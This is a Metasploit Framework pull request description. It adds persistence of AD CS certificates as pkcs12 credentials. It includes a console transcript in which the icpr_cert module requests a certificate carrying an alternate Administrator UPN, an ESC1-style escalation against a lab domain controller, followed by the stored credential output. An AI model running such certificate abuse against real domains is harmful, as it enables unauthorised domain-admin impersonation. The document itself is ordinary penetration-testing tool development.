rapid7/metasploit-framework
# Persist icpr cert as pkcs12 credential

Add support for persisting pkcs12 credentials in Metasploit. Updates the `admin/dcerpc/icpr_cert` module to persist requested certificates.

Depends on https://github.com/rapid7/metasploit-credential/pull/169

Example:

```
msf6 auxiliary(admin/dcerpc/icpr_cert) > rerun smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13 ca=adf3-DC3-CA cert_template=ESC1-Test smbdomain=ADF3.LOCAL alt_upn=Administrator@adf3.local
[*] Reloading module...
[*] Running module against 192.168.123.13

[*] 192.168.123.13:445 - Requesting a certificate...
[+] 192.168.123.13:445 - The requested certificate was issued.
[*] 192.168.123.13:445 - Certificate UPN: Administrator@adf3.local
[*] 192.168.123.13:445 - Certificate stored at: /Users/adfoster/.msf4/loot/20221209012934_default_unknown_windows.ad.cs_070132.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > creds
Credentials
===========

host            origin          service        public                    private                                                              realm  private_type  JtR Format
----            ------          -------        ------                    -------                                                              -----  ------------  ----------
192.168.123.13  192.168.123.13  445/tcp (smb)  Administrator@adf3.local  subject: /CN=Administrator,issuer: /DC=local/DC=adf3/CN=adf3-DC3-CA         Pkcs12 (pfx)  
```

The pfx base64 blob is output with `creds -v` or `creds -o foo.txt` after https://github.com/rapid7/metasploit-framework/pull/17355 is merged

## Verification

- Ensure the database is connect
- Ensure `bundle exec rails db:migrate` has been run
- Verify the certifried exploit module works and that the creds command shows the pfx as expected
- Verify the `admin/dcerpc/icpr_cert` request works - using the steps from https://github.com/rapid7/metasploit-framework/pull/17240 and verify that the output of the creds command
- Verify the steps in https://github.com/rapid7/metasploit-credential/pull/169
